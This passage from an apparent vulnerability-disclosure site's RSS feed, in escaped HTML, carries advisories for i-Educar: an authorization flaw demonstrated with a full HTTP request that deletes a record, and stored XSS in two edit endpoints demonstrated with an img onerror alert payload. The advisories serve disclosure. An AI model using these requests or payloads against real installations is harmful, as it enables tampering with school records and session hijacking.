&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;code&amp;gt;GET /module/Api/aluno&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to enforce authorization checks to ensure that only privileged users (e.g., administrators) can perform sensitive operations like deleting an abandonment status. By altering the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter, an attacker can affect records that do not belong to them.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Authenticate as a non-privileged user.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9760/image.png&amp;#34;
	width=&amp;#34;1380&amp;#34;
	height=&amp;#34;528&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9760/image_hu_e9ed6b29581f01dc.png 480w, /p/cve-2025-9760/image_hu_374181a535d27950.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;261&amp;#34;
		data-flex-basis=&amp;#34;627px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Send the following request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/Api/matricula?&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;oper=delete&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;resource=abandono&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;id=206 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: application/json, text/javascript, */*; q=0.01
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/educar_matricula_det.php?cod_matricula=206
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=Mz9IKWGOP641g4BLkSGRnxs69wk4ChmUUxUerX19
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;We could observe that the deletion was successful.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9760/image-1.png&amp;#34;
	width=&amp;#34;1574&amp;#34;
	height=&amp;#34;542&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9760/image-1_hu_6621613282a2babf.png 480w, /p/cve-2025-9760/image-1_hu_7a7d76a95a6fa6ef.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;290&amp;#34;
		data-flex-basis=&amp;#34;696px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This is a Broken Function Level Authorization (BFLA) vulnerability, as categorized by OWASP API Security Top 10 (2023) - API4. The consequences include:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Tampering with academic data without authorization.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of data integrity in school records.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Potential legal and reputational damage for educational institutions.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9760.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9760.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9720</title>
        <link>https://www.cvehunters.com/p/cve-2025-9720/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9720/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9720-cross-site-scripting-xss-stored-endpoint-tabelaarredondamentoedit-parameter-nome&amp;#34;&amp;gt;CVE-2025-9720: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;TabelaArredondamento/edit&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9720&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9720&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;TabelaArredondamento/edit&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;TabelaArredondamento/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9720-cross-site-scripting-xss-stored-endpoint-tabelaarredondamentoedit-parameter-nome&amp;#34;&amp;gt;CVE-2025-9720: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;TabelaArredondamento/edit&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9720&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9720&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;TabelaArredondamento/edit&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;TabelaArredondamento/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9720/image.png&amp;#34;
	width=&amp;#34;646&amp;#34;
	height=&amp;#34;278&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9720/image_hu_9177624e6cc80aee.png 480w, /p/cve-2025-9720/image_hu_228acf1500b7defe.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;232&amp;#34;
		data-flex-basis=&amp;#34;557px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9720.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9720.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 31 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9721</title>
        <link>https://www.cvehunters.com/p/cve-2025-9721/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9721/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9721-multiples-cross-site-scripting-xss-stored-in-endpoint-formulamediaedit&amp;#34;&amp;gt;CVE-2025-9721: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;FormulaMedia/edit&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9721&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9721&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;FormulaMedia/edit&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;formulaMedia&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9721-multiples-cross-site-scripting-xss-stored-in-endpoint-formulamediaedit&amp;#34;&amp;gt;CVE-2025-9721: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;FormulaMedia/edit&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9721&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9721&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;FormulaMedia/edit&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;formulaMedia&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;formulaMedia&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;formulaMedia&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span 